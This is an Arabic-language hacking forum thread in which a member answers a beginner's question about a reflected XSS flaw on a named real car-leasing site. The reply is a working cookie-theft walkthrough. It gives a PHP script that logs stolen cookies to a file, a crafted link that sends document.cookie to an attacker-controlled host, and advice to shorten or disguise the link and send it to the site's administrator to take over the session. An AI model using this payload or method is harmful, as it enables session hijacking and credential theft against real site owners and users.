سؤال xss

السلام علكم
كيفكم شبااب

سؤال يا شباب
انا ايش بستفيد من هالتغير xss

الله وعلم هي موقع مصاب xss

في هي حال ايش عمل

ايش فايده

http://www.carlease.ae/special_more.php?id=</title><script>alert('xss');</script>

اوك
شوف يا حج
الاول تكون عارف ايميل الادمن او اى وسيله للاتصال بيه
تانى حاجه روح على اى شل معاك اعمل ملف بى اتش بى جديد وحط فيه الكود ده

<?php
$cookie = $_GET[“fa”];
if(isset($cookie))
{
$fp = fopen(“log.txt”,“a+”);
fwrite($fp,$cookie . "
");
fclose($fp);
}
?>
<script>
location.replace(“http://carlease.ae”);
</script>

تالت حاجه بفرض انك عملت الملف هنا مثلا
faris.com/xss.php
عدل رابط الاكس اس اس خليه كده

http://www.carlease.ae/special_more.php?id=&lt;script&gt;location.href=‘http://faris.com/xss.php?fa=’+document.cookie&lt;/script&gt;

اخر حاجه شوف اى موقع لاختصار الروابط واختصر رابط الاستغلال الاخير ده
او اعمل تمويه ليه بأى طريقه زى تشفيره مثلا
وابعته للادمن
شويه وروح على
faris.com/log.txt
تلاقى الكوكيز
سواء كانت يوزر وباس او كوكيز تدخل بيها
على حسب بقى :slight_smile:

^^

في الموعد ياباشى ض1

ههههههههههههههههه
فاتت علينا فى الدوره دى يا زيزو
بكره نحطلها شرح ان شاء الله

الف شكر ستاد فارس

اسف جدا يا ستاد فارس
محسوبك مبتده من تحت صفر عملت كل شي عشان رفع شي ما **ط شي معي فس الدوره
بدي شويت وقت عشان فهم الاكس اس اس
وبنطار الشرح في الدوره بتفصيل